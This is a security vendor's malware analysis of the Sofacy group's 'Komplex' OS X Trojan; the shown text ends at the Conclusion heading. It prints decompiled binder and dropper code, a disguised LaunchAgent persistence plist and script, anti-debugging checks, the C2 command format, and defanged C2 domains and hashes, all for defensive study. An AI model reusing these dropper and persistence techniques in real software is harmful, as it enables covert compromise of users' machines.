[![Logo](https://www.paloaltonetworks.com/wp-content/uploads/2021/07/PANW_Parent.png)](https://www.paloaltonetworks.com/)  
[![Unit42 Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/unit42-logo-white.svg)](https://unit42.paloaltonetworks.com/)  
Menu

* [Tools](https://unit42.paloaltonetworks.com/tools/)
* [ATOMs](https://unit42.paloaltonetworks.com/atoms/)
* [Security Consulting](https://www.paloaltonetworks.com/unit42)
* [About Us](https://unit42.paloaltonetworks.com/about-unit-42/)
* [**Under Attack?**](https://start.paloaltonetworks.com/contact-unit42.html)  
  English
* [English](https://unit42.paloaltonetworks.com/unit42-sofacys-komplex-os-x-trojan/)
* [Japanese](https://unit42.paloaltonetworks.com/ja/unit42-sofacys-komplex-os-x-trojan/)
* [Threat Research Center](https://unit42.paloaltonetworks.com "Threat Research")
* [Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/ "Threat Research")
* [Malware](https://unit42.paloaltonetworks.com/category/malware/ "Malware")  
  [Malware](https://unit42.paloaltonetworks.com/category/malware/)

# Sofacy's 'Komplex' OS X Trojan

![Clock Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-clock.svg) 10 min read  
Related Products  
[![Unit 42 Incident Response icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/unit42_RGB_logo_Icon_Color.png)Unit 42 Incident Response](https://unit42.paloaltonetworks.com/product-category/unit-42-incident-response/ "Unit 42 Incident Response")

* ![Profile Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-profile-grey.svg)  
  By:
  
  * [Dani Creus](https://unit42.paloaltonetworks.com/author/dani-creus/)
  * [Tyler Halfpop](https://unit42.paloaltonetworks.com/author/tyler-halfpop/)

* ![Published Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-calendar-grey.svg)  
  Published:September 26, 2016

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-category.svg)  
  Categories:
  
  * [Malware](https://unit42.paloaltonetworks.com/category/malware/)
  * [Threat Actor Groups](https://unit42.paloaltonetworks.com/category/threat-actor-groups/)
  * [Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/)

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-tags-grey.svg)  
  Tags:
  
  * [Aerospace](https://unit42.paloaltonetworks.com/tag/aerospace/)
  * [Fighting Ursa](https://unit42.paloaltonetworks.com/tag/fighting-ursa/)
  * [Komplex](https://unit42.paloaltonetworks.com/tag/komplex/)
  * [OS X](https://unit42.paloaltonetworks.com/tag/os-x/)
  * [Sofacy](https://unit42.paloaltonetworks.com/tag/sofacy/)
  * [Trojan](https://unit42.paloaltonetworks.com/tag/trojan/)

* [![Download Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-download.svg)](https://unit42.paloaltonetworks.com/unit42-sofacys-komplex-os-x-trojan/?pdf=download&lg=en&_wpnonce=e8ab0975ea "Click here to download")

* [![Print Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-print.svg)](https://unit42.paloaltonetworks.com/unit42-sofacys-komplex-os-x-trojan/?pdf=print&lg=en&_wpnonce=e8ab0975ea "Click here to print")

Share![Down arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/down-arrow.svg)

* ![Link Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-share-link.svg)
* [![Link Email](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-sms.svg)](mailto:?subject=Sofacy’s%20‘Komplex’%20OS%20X%20Trojan&body=Check%20out%20this%20article%20https%3A%2F%2Funit42.paloaltonetworks.com%2Funit42-sofacys-komplex-os-x-trojan%2F "Share in email")
* [![Facebook Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-fb-share.svg)](https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Funit42.paloaltonetworks.com%2Funit42-sofacys-komplex-os-x-trojan%2F "Share in Facebook")
* [![LinkedIn Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-linkedin-share.svg)](https://www.linkedin.com/sharing/share-offsite/?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Funit42-sofacys-komplex-os-x-trojan%2F&title=Sofacy’s%20‘Komplex’%20OS%20X%20Trojan "Share in LinkedIn")
* [![Twitter Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-twitter-share.svg)](https://twitter.com/intent/tweet?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Funit42-sofacys-komplex-os-x-trojan%2F&text=Sofacy’s%20‘Komplex’%20OS%20X%20Trojan "Share in Twitter")
* [![Reddit Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-reddit-share.svg)](https://www.paloaltonetworks.com//www.reddit.com/submit?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Funit42-sofacys-komplex-os-x-trojan%2F&ts=markdown "Share in Reddit")
* [![Mastodon Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-mastodon-share.svg)](https://mastodon.social/share?text=Sofacy’s%20‘Komplex’%20OS%20X%20Trojan%20https%3A%2F%2Funit42.paloaltonetworks.com%2Funit42-sofacys-komplex-os-x-trojan%2F "Share in Mastodon")
  Unit 42 researchers identified a new OS X Trojan associated with the Sofacy group that we are now tracking with the 'Komplex' tag using the Palo Alto Networks AutoFocus threat intelligence platform.

The Sofacy group, also known as APT28, Pawn Storm, Fancy Bear, and Sednit, continues to add to the variety of tools they use in attacks; in this case, targeting individuals in the aerospace industry running the OS X operating system. During our analysis, we determined that Komplex was used in a previous attack campaign targeting individuals running OS X that exploited a vulnerability in the MacKeeper antivirus application to deliver Komplex as a payload. Komplex shares a significant amount of functionality and traits with another tool used by Sofacy - the Carberp variant that Sofacy had used in [previous attack campaigns](https://blog.paloaltonetworks.com/2016/06/unit42-new-sofacy-attacks-against-us-government-agency/) on systems running Windows. In addition to shared code and functionality, we also discovered Komplex command and control (C2) domains that overlapped with previously identified phishing campaign infrastructures associated with the Sofacy group.

### Komplex Binder

Komplex is a Trojan that the Sofacy group created to compromise individuals using OS X devices. The Trojan has multiple parts, first leading with a binder component that is responsible for saving a second payload and a decoy document to the system. We found three different versions of the Komplex binder, one that was created to run on x86, another on x64, and a third that contained binders for both x86 and x64 architectures. We found the following samples of the Komplex binder:  
2a06f142d87bd9b66621a30088683d6fcec019ba5cc9e5793e54f8d920ab0134: Mach-O 64- bit executable x86\_64 c1b8fc00d815e777e39f34a520342d1942ebd29695c9453951a988c61875bcd7: Mach-O executable i386 cffa1d9fc336a1ad89af90443b15c98b71e679aeb03b3a68a5e9c3e7ecabc3d4: Mach-O universal binary with 2 architectures

|-------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 | 2a06f142d87bd9b66621a30088683d6fcec019ba5cc9e5793e54f8d920ab0134: Mach-O 64- bit executable x86\_64 c1b8fc00d815e777e39f34a520342d1942ebd29695c9453951a988c61875bcd7: Mach-O executable i386 cffa1d9fc336a1ad89af90443b15c98b71e679aeb03b3a68a5e9c3e7ecabc3d4: Mach-O universal binary with 2 architectures |

Regardless of architecture, these initial binders all save a second embedded Mach-O file to '/tmp/content'. This file is the Komplex dropper used in the next stage of installation and to maintain persistence. After saving the Komplex dropper, these binders would then save a legitimate decoy document to the system and open them using the 'Preview' application to minimize suspicion of any malicious activity. Figure 1 shows the main function found in one of the initial droppers that saves and opens a PDF decoy, as well as executes another executable file saved as '/tmp/content'.  
int \_main(int arg0, int arg1) { var\_28 = \[\[NSAutoreleasePool alloc\] init\]; var\_38 = \[NSSearchPathForDirectoriesInDomains(0xf, 0x1, 0x1) objectAtIndex:0x0\]; var\_40 = \[NSString stringWithFormat:@"%@/roskosmos\_2015-2025.pdf", var\_38\]; var\_48 = \[NSString stringWithFormat:@"SetFile -a E %@/roskosmos\_2015-2025.pdf", var\_38\]; var\_50 = \[NSString stringWithFormat:@"rm -rf %@/roskosmos\_2015-2025.app", var\_38\]; var\_58 = \[NSString stringWithFormat:@"open -a Preview.app %@/roskosmos\_2015- 2025.pdf", var\_38\]; \[\[NSData dataWithBytes:\_joiner length:0x20f74\] writeToFile:@"/tmp/content" atomically:0x1\]; system(\[var\_50 UTF8String\]); system("chmod 755 /tmp/content"); \[\[NSData dataWithBytes:\_pdf length:0x182c82\] writeToFile:var\_40 atomically:0x1\]; system(\[var\_48 UTF8String\]); var\_70 = \[\[NSTask alloc\] init\]; \[var\_70 setLaunchPath:@"/tmp/content"\]; \[var\_70 launch\]; \[var\_70 waitUntilExit\]; system(\[var\_58 UTF8String\]); remove(\*arg1); \[var\_28 release\]; return 0x0; }

|----------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 | int \_main(int arg0, int arg1) { var\_28 = \[\[NSAutoreleasePool alloc\] init\]; var\_38 = \[NSSearchPathForDirectoriesInDomains(0xf, 0x1, 0x1) objectAtIndex:0x0\]; var\_40 = \[NSString stringWithFormat:@"%@/roskosmos\_2015-2025.pdf", var\_38\]; var\_48 = \[NSString stringWithFormat:@"SetFile -a E %@/roskosmos\_2015-2025.pdf", var\_38\]; var\_50 = \[NSString stringWithFormat:@"rm -rf %@/roskosmos\_2015-2025.app", var\_38\]; var\_58 = \[NSString stringWithFormat:@"open -a Preview.app %@/roskosmos\_2015- 2025.pdf", var\_38\]; \[\[NSData dataWithBytes:\_joiner length:0x20f74\] writeToFile:@"/tmp/content" atomically:0x1\]; system(\[var\_50 UTF8String\]); system("chmod 755 /tmp/content"); \[\[NSData dataWithBytes:\_pdf length:0x182c82\] writeToFile:var\_40 atomically:0x1\]; system(\[var\_48 UTF8String\]); var\_70 = \[\[NSTask alloc\] init\]; \[var\_70 setLaunchPath:@"/tmp/content"\]; \[var\_70 launch\]; \[var\_70 waitUntilExit\]; system(\[var\_58 UTF8String\]); remove(\*arg1); \[var\_28 release\]; return 0x0; } |

*Figure* *1* *Main function within the Komplex binder*

The binder component saves a decoy document named roskosmos\_2015-2025.pdf to the system and opens it using the Preview application built into OS X. Figure 2 shows a portion of the 17 page decoy document. This document is titled "Проект Федеральной космической программы России на 2016 - 2025 годы" and describes the Russian Federal Space Program's projects between 2016 and 2025. We do not have detailed targeting information regarding the Sofacy group's attack campaign delivering Komplex at this time; however, based on the contents of the decoy document, we believe that the target is likely associated with the aerospace industry.

[![sofacy\_1](http://blog.paloaltonetworks.com/wp-content/uploads/2016/09/Sofacy_1-500x391.png)](https://unit42.paloaltonetworks.com/wp-content/uploads/2016/09/Sofacy_1.png)

*Figure* *2* *Decoy document opened by Komplex binder showing document regarding the Russian Space Program*

### Komplex Dropper

The Komplex dropper component is saved to the system as "/tmp/content" (SHA256: 96a19a90caa41406b632a2046f3a39b5579fbf730aca2357f84bf23f2cbc1fd3) and is responsible for installing a third executable to the system and setting up persistence for the third executable to launch each time the OS X operating system starts. This dropper also provided the basis for the name "Komplex", which is seen in several folder paths that were included within the Mach-O file, such as "/Users/kazak/Desktop/Project/komplex".

The Komplex dropper is fairly straightforward from a functional perspective, as it contains all of its functionality within its "\_main" function. The "\_main" function (Figure 3) accesses data within three variables named '\_Payload\_1', '\_Payload\_2' and '\_Payload\_3', and writes them to three files on the system.  
int \_main(int arg0, int arg1) { var\_38 = \[\[NSAutoreleasePool alloc\] init\]; var\_40 = \[NSData dataWithBytes:\_Payload\_1 length:0x15c1c\]; var\_48 = \[NSData dataWithBytes:\_Payload\_2 length:0x201\]; var\_50 = \[NSData dataWithBytes:\_Payload\_3 length:0x4c\]; system("mkdir -p /Users/Shared/.local/ \&\> /dev/null"); system("mkdir -p ~/Library/LaunchAgents/ \&\> /dev/null"); \[var\_40 writeToFile:@"/Users/Shared/.local/kextd" atomically:0x1\]; \[var\_48 writeToFile:@"/Users/Shared/com.apple.updates.plist" atomically:0x1\]; \[var\_50 writeToFile:@"/Users/Shared/start.sh" atomically:0x1\]; system("cp /Users/Shared/com.apple.updates.plist $HOME/Library/LaunchAgents/ \&\>/dev/null"); remove("/Users/Shared/com.apple.updates.plist"); system("chmod 755 /Users/Shared/.local/kextd"); system("chmod 755 /Users/Shared/start.sh"); var\_58 = \[\[NSTask alloc\] init\]; \[var\_58 setLaunchPath:@"/Users/Shared/start.sh"\]; \[var\_58 launch\]; \[var\_58 waitUntilExit\]; remove("/Users/Shared/start.sh"); remove(\*arg1); \[var\_38 release\]; return 0x0; }

|-------------------------------------------------------------------|---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 | int \_main(int arg0, int arg1) { var\_38 = \[\[NSAutoreleasePool alloc\] init\]; var\_40 = \[NSData dataWithBytes:\_Payload\_1 length:0x15c1c\]; var\_48 = \[NSData dataWithBytes:\_Payload\_2 length:0x201\]; var\_50 = \[NSData dataWithBytes:\_Payload\_3 length:0x4c\]; system("mkdir -p /Users/Shared/.local/ \&\> /dev/null"); system("mkdir -p ~/Library/LaunchAgents/ \&\> /dev/null"); \[var\_40 writeToFile:@"/Users/Shared/.local/kextd" atomically:0x1\]; \[var\_48 writeToFile:@"/Users/Shared/com.apple.updates.plist" atomically:0x1\]; \[var\_50 writeToFile:@"/Users/Shared/start.sh" atomically:0x1\]; system("cp /Users/Shared/com.apple.updates.plist $HOME/Library/LaunchAgents/ \&\>/dev/null"); remove("/Users/Shared/com.apple.updates.plist"); system("chmod 755 /Users/Shared/.local/kextd"); system("chmod 755 /Users/Shared/start.sh"); var\_58 = \[\[NSTask alloc\] init\]; \[var\_58 setLaunchPath:@"/Users/Shared/start.sh"\]; \[var\_58 launch\]; \[var\_58 waitUntilExit\]; remove("/Users/Shared/start.sh"); remove(\*arg1); \[var\_38 release\]; return 0x0; } |

*Figure* *3* *Komplex Dropper's main function that drops three files to the system and runs a shell script*

The "\_main" function writes the data within '\_Payload\_1', '\_Payload\_2', and '\_Payload\_3' variables to the following files, respectively:

1. /Users/Shared/.local/kextd (SHA256:  
   227b7fe495ad9951aebf0aae3c317c1ac526cdd255953f111341b0b11be3bbc5)
2. /Users/Shared/com.apple.updates.plist (SHA256:  
   1f22e8f489abff004a3c47210a9642798e1c53efc9d6f333a1072af4b11d71ef)
3. /Users/Shared/start.sh (SHA256:  
   d494e9f885ad2d6a2686424843142ddc680bb5485414023976b4d15e3b6be800)

The shell script saved to '/Users/Shared/start.sh' calls the system command 'launchctl' to add a plist entry into 'launchd' to automatically execute the Komplex payload each time the system starts. Figure 4 shows the contents of the 'start.sh' script that sets up persistence for the payload.  
\#!/bin/sh launchctl load -w ~/Library/LaunchAgents/com.apple.updates.plist

|-----|-----------------------------------------------------------------------------|
| 1 2 | #!/bin/sh launchctl load -w ~/Library/LaunchAgents/com.apple.updates.plist |

*Figure* *4* *Contents of the start.sh shell script that calls launchctl*

The 'start.sh' script loads 'com.apple.updates.plist', which sets the properties of the Komplex payload that is executed from "/Users/Shared/.local/kextd" at system start up courtesy of the "RunAtLoad" parameter. Figure 5 shows the contents of the 'com.apple.updates.plist' file loaded into 'launchd'.  
\<?xml version="1.0" encoding="UTF-8"?\> \<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"\> \<plist version="1.0"\> \<dict\> \<key\>Label\</key\> \<string\>com.apple.updates\</string\> \<key\>ProgramArguments\</key\> \<array\> \<string\>/Users/Shared/.local/kextd\</string\> \</array\> \<key\>KeepAlive\</key\> \<false/\> \<key\>RunAtLoad\</key\> \<true/\> \<key\>StandardErrorPath\</key\> \<string\>/dev/null\</string\> \<key\>StandardOutPath\</key\> \<string\>/dev/null\</string\> \</dict\> \</plist\>

|-------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 | \<?xml version="1.0" encoding="UTF-8"?\> \<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"\> \<plist version="1.0"\> \<dict\> \<key\>Label\</key\> \<string\>com.apple.updates\</string\> \<key\>ProgramArguments\</key\> \<array\> \<string\>/Users/Shared/.local/kextd\</string\> \</array\> \<key\>KeepAlive\</key\> \<false/\> \<key\>RunAtLoad\</key\> \<true/\> \<key\>StandardErrorPath\</key\> \<string\>/dev/null\</string\> \<key\>StandardOutPath\</key\> \<string\>/dev/null\</string\> \</dict\> \</plist\> |

*Figure* *5* *Contents of the com.apple.updates.plist file showing how the dropper achieves persistence*

### Komplex Payload

The ultimate purpose of the aforementioned components is to install and execute the Komplex payload. The dropper component saves the payload to "/Users/Shared/.local/kextd" (SHA256: 227b7fe495ad9951aebf0aae3c317c1ac526cdd255953f111341b0b11be3bbc5) and ultimately executes the payload. The payload begins by conducting an anti-debugging check to see if it is being debugged before proceeding with executing its main functionality, which can be seen in the "AmIBeingDebugged" function in Figure 6. The "AmIBeingDebugged" function uses the "sysctl" function to check to see if a specific "P\_TRACED" flag is set, which signifies that the process is being debugged. A particularly interesting part of this function is that it is very similar to the function provided by Apple to its developers in a [guide created in 2004 titled "Detecting the Debugger".](https://developer.apple.com/library/content/qa/qa1361/_index.html) This is not the first time the Sofacy group's malware authors have obtained techniques from publicly available sources, as demonstrated in the use of the [Office Test Persistence Method](https://blog.paloaltonetworks.com/2016/07/unit42-technical-walkthrough-office-test-persistence-method-used-in-recent-sofacy-attacks/) that they obtained from a [blog posted in 2014](https://www.hexacorn.com/blog/2014/04/16/beyond-good-ol-run-key-part-10/).  
int AmIBeingDebugged()() { var\_8 = \*\*\_\_stack\_chk\_guard; getpid(); if ((((sysctl(0x1, 0x4, var\_2A8, 0x288, 0x0, 0x0) == 0x0 ? 0x1 : 0x0) ^ 0x1) \& 0x1 \& 0xff) != 0x0) { rax = \_\_assert\_rtn("AmIBeingDebugged", "/Users/user/Desktop/LoaderWinApi/LoaderWinApi/main.mm", 0x21, "junk == 0"); } else { var\_2C1 = (0x0 \& 0x800) != 0x0 ? 0x1 : 0x0; if (\*\*\_\_stack\_chk\_guard == var\_8) { rax = var\_2C1 \& 0x1 \& 0xff; } else { rax = \_\_stack\_chk\_fail(); } } return rax; }

|-------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 | int AmIBeingDebugged()() { var\_8 = \*\*\_\_stack\_chk\_guard; getpid(); if ((((sysctl(0x1, 0x4, var\_2A8, 0x288, 0x0, 0x0) == 0x0 ? 0x1 : 0x0) ^ 0x1) \& 0x1 \& 0xff) != 0x0) { rax = \_\_assert\_rtn("AmIBeingDebugged", "/Users/user/Desktop/LoaderWinApi/LoaderWinApi/main.mm", 0x21, "junk == 0"); } else { var\_2C1 = (0x0 \& 0x800) != 0x0 ? 0x1 : 0x0; if (\*\*\_\_stack\_chk\_guard == var\_8) { rax = var\_2C1 \& 0x1 \& 0xff; } else { rax = \_\_stack\_chk\_fail(); } } return rax; } |

*Figure* *6* *The AmIBeingDebugged function used as an anti-analysis technique*

After determining that it is not running in a debugger, the payload performs an anti-analysis/sandbox check by issuing a GET request to Google, to check for Internet connectivity. The payload will sleep until it receives a response from the HTTP requests to Google, which means Komplex will only communicate to its C2 servers in Internet enabled environments. Figure 7 shows the "connectedToInternet" function that confirms whether the payload is able to communicate with "http://www.google.com" before carrying out its functionality.  
int connectedToInternet()() { if (\[NSData dataWithContentsOfURL:\[NSURL URLWithString:@"http://www.google.com"\]\] != 0x0) { var\_1 = 0x1; } else { var\_1 = 0x0; } rax = var\_1 \& 0x1 \& 0xff; return rax; }

|-------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 10 11 | int connectedToInternet()() { if (\[NSData dataWithContentsOfURL:\[NSURL URLWithString:@"http://www.google.com"\]\] != 0x0) { var\_1 = 0x1; } else { var\_1 = 0x0; } rax = var\_1 \& 0x1 \& 0xff; return rax; } |

*Figure* *7* *The connectedToInternet function testing for an active Internet connection*

After confirming an active Internet connection, the Komplex payload begins carrying out its main functionality. The Komplex payload uses an 11-byte XOR algorithm to decrypt strings used for configuration and within C2 communications, including the C2 domains themselves. Figure 8 shows a screenshot of Komplex's custom string decryption algorithm, along with the XOR key used to decrypt strings within the payload.

[![sofacy\_2](http://blog.paloaltonetworks.com/wp-content/uploads/2016/09/Sofacy_2-500x345.png)](https://unit42.paloaltonetworks.com/wp-content/uploads/2016/09/Sofacy_2.png)

*Figure* *8* *11-byte XOR algorithm used by Komplex to decrypt configuration strings*

The algorithm seen in Figure 8 decrypts the strings seen in Table 1, which the payload references using the associated variable names. The payload uses these decrypted strings for a variety of purposes, such as command parsing and C2 server locations.

*** ** * ** ***

|-------------------|-------------------------------------------------------------------|
| **Variable Name** | **Decrypted String**                                              |
| FILE\_NAME         | FileName                                                          |
| PATHTOSAVE        | PathToSave                                                        |
| START\_BLOCK\_FILE  | \[file\]                                                          |
| BLOCK\_EXECUTE     | Execute                                                           |
| BLOCK\_DELETE      | Delete                                                            |
| END\_BLOCK\_FILE    | \[/file\]                                                         |
| SERVERS           | appleupdate\[.\]org, apple-iclouds\[.\]net, itunes-helper\[.\]net |
| MAC               | mac                                                               |
| CONFIG            | config                                                            |
| GET\_CONFIG        | 1                                                                 |
| FILES             | file                                                              |
| LOG               | log                                                               |
| OLD\_CONFIG        | 2                                                                 |
| ID                | id                                                                |
| TOKEN             | h8sn3vq6kl                                                        |
| EXTENSIONS        | .xml .pdf, .htm, .zip                                             |

*** ** * ** ***

*Table* *1* *Strings decrypted by Komplex and their referenced name*

The Komplex payload uses the SERVERS variable to obtain the location of its C2, which it communicates with using HTTP POST requests. The payload generates a URL to communicate with its C2 server that has the following structure:

/\<random path\>/\<random string\>.\<chosen extension\>/?\<random string\>=\<encrypted token\>

The \<chosen extension\> portion of the URL is chosen at random from the list of legitimate file extensions: .xml, .zip, .htm and .pdf. The \<encrypted token\> within the parameters of the URL is base64 encoded ciphertext created from the string 'h8sn3vq6kl'. The ciphertext of the string is generated via a custom algorithm that uses a random 4-byte integer as a key that is modified by XOR with the static value 0xE150722. The payload also encrypts the data sent within the POST request using the same algorithm and encodes it using base64. Figure 9 below shows an example HTTP POST sent from the payload to its C2 server.

[![sofacy\_3](http://blog.paloaltonetworks.com/wp-content/uploads/2016/09/Sofacy_3-500x406.png)](https://unit42.paloaltonetworks.com/wp-content/uploads/2016/09/Sofacy_3.png)

*Figure* *9* *Beacon sent from Komplex to C2 containing system information within the HTTP POST data*

The HTTP POST data in Figure 9 is comprised of information that the malware collects from the infected system. The system information sent to the C2 includes data such as the system version, username, and process list, which is gathered within a function named "getOsInfo" within the "InfoOS" class (Figure 10).  
int InfoOS::getOsInfo()() { var\_38 = rdi; var\_18 = \[\[NSProcessInfo processInfo\] operatingSystemVersionString\]; var\_20 = NSUserName(); var\_28 = InfoOS::getProcessList(); var\_30 = operator new\[\](strlen(var\_28) + 0x200); sprintf(var\_30, "Mac OS X - %s %s\\nUser name - %s\\n\\t\\t\\t\\t\\t\\tProcess list :\\n\\n%s", \[var\_18 UTF8String\], InfoOS::bitOS(), \[var\_20 UTF8String\], var\_28); rax = var\_30; return rax; }

|----------------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 10 11 12 | int InfoOS::getOsInfo()() { var\_38 = rdi; var\_18 = \[\[NSProcessInfo processInfo\] operatingSystemVersionString\]; var\_20 = NSUserName(); var\_28 = InfoOS::getProcessList(); var\_30 = operator new\[\](strlen(var\_28) + 0x200); sprintf(var\_30, "Mac OS X - %s %s\\nUser name - %s\\n\\t\\t\\t\\t\\t\\tProcess list :\\n\\n%s", \[var\_18 UTF8String\], InfoOS::bitOS(), \[var\_20 UTF8String\], var\_28); rax = var\_30; return rax; } |

*Figure* *10* *getOsInfo function within Komplex that gathers system information for C2 beacon*

The Sofacy C2 server will respond to this HTTP request with encrypted data that the payload will decrypt using the same custom algorithm used to encrypt the POST data. The Komplex payload will parse the C2 response for the following strings: "\[file\]" and "\[/file\]", "FileName=", "PathToSave=", "Shell=", "Execute", and "Delete". The "Delete" action does nothing more than delete a file specified by 'PathToSave'/'FileName', whereas the "Execute" action involves running the following system commands before executing the specified file:  
mkdir -p \&lt;'PathToSave'\&gt; \&amp;\&gt; /dev/null chmod 755 \&lt;'PathToSave'\&gt;/\&lt;'FileName'\&gt; \&amp;\&gt; /dev/null

|-----|-----------------------------------------------------------------------------------------------------------------------------------|
| 1 2 | mkdir -p \&lt;'PathToSave'\&gt; \&amp;\&gt; /dev/null chmod 755 \&lt;'PathToSave'\&gt;/\&lt;'FileName'\&gt; \&amp;\&gt; /dev/null |

The payload will treat "\[file\]" and "\[/file\]" as delimiters that specify the data that the payload should write to a specified file, which allows the threat actor to download additional files to the system. Lastly, the payload can execute commands on the compromised system specified within the "Shell" field, which the payload will execute and then send results back to the C2.

### Connections to Sofacy and Previous Attacks.

**Code Overlaps**

While reverse engineering the Komplex payload, we came across a few code overlaps that we believed were worth exploring. First, we noticed striking similarities between the Komplex payload and the traits and behavior of an OS X Trojan discussed in a BAE Systems blog titled [NEW MAC OS MALWARE EXPLOITS MACKEEPER.](https://baesystemsai.blogspot.com/2015/06/new-mac-os-malware-exploits-mackeeper.html) According to this blog post, an OS X Trojan was delivered via a vulnerability in the MacKeeper application. The nameless OS X Trojan uses an 11-byte XOR algorithm to decrypt an embedded configuration, which has all of the same variable names and values as the Komplex sample (see Table 1). The algorithm used to encrypt and decrypt the network traffic, as well as all static elements of the network communications (composition of URL, structure of HTTP data, command parsing procedure, etc.) discussed in the blog post are the exact same as seen in the Komplex payload. These overlaps suggest that the Trojan delivered by the MacKeeper vulnerability was in fact the Komplex Trojan.

The second code overlap ties the Komplex Trojan to Sofacy's Carberp variant, which we have analyzed in [previous research efforts](https://blog.paloaltonetworks.com/2016/06/unit42-new-sofacy-attacks-against-us-government-agency/). Even though Komplex was created to run on OS X and Sofacy's Carberp variant was developed to run on Windows, they share many commonalities, including:

* Same URL generation logic using random path values, a random file extension and encrypted token
* Same file extensions used in C2 URL that are listed within the binaries in the same order
* Same algorithm used to encrypt and decrypt the token in the URL and HTTP POST data (Carberp key is modified using value 0xAA7D756 whereas Komplex uses 0xE150722)
* Very similar command handling, including parsing specifically for Execute, Delete, \[file\], \[/file\], FileName, and PathToSave.
* Checks for Internet connectivity by connecting to google.com
* Uses an 11-byte XOR key to decrypt strings within the configuration

In addition to these common traits, we found a Sofacy Carberp variant (SHA256: 638e7ca68643d4b01432f0ecaaa0495b805cc3cccc17a753b0fa511d94a22bdd) using the same TOKEN value of 'h8sn3vq6kl' within its C2 URL, as observed in Komplex payloads. Based on these observations, we believe that the author of Sofacy's Carberp variant used the same code, or at least the same design, to create the Komplex Trojan. A benefit of retaining many of the same functionalities within the Windows and OS X Trojans is that it would require fewer alterations to the C2 server application to handle cross-platform implants.

**Infrastructure Overlap**

While Komplex's C2 domain appleupdate\[.\]org does not appear to have any previously known activity associated with it, both the apple-iclouds\[.\]net and itunes-helper\[.\]net domains have direct ties to Sofacy activity. The apple-iclouds\[.\]net domain is mentioned within a [PwC Tactical Intelligence Bulletin](https://pwc.blogs.com/files/tactical-intelligence-bulletin---sofacy-phishing.pdf) that discussed a phishing campaign conducted by the Sofacy group. The itunes-helper\[.\]net domain is associated with separate activity discussed in Trend Micro's blog titled [Looking Into a Cyber-Attack Facilitator in the Netherlands](https://blog.trendmicro.com/trendlabs-security-intelligence/looking-into-a-cyber-attack-facilitator-in-the-netherlands/) that included research on hosting providers used by Pawn Storm (Sofacy).

The domain appleupdate\[.\]org does have one interesting correlation point, specifically involving the IP 185.10.58\[.\]170 that resolved this domain between April 2015 through April 2016. Researchers at BAE Systems provided Unit 42 the Komplex payload delivered through the exploitation of MacKeeper (Dropper SHA256: da43d39c749c121e99bba00ce809ca63794df3f704e7ad4077094abde4cf2a73 and Payload SHA256: 45a93e4b9ae5bece0d53a3a9a83186b8975953344d4dfb340e9de0015a247c54), which used the IP address 185.10.58\[.\]170 within its configuration as a C2 server. This infrastructure overlap further strengthens the connection between the Komplex payload we discovered with the prior campaign using MacKeeper for delivery.

### Conclusion

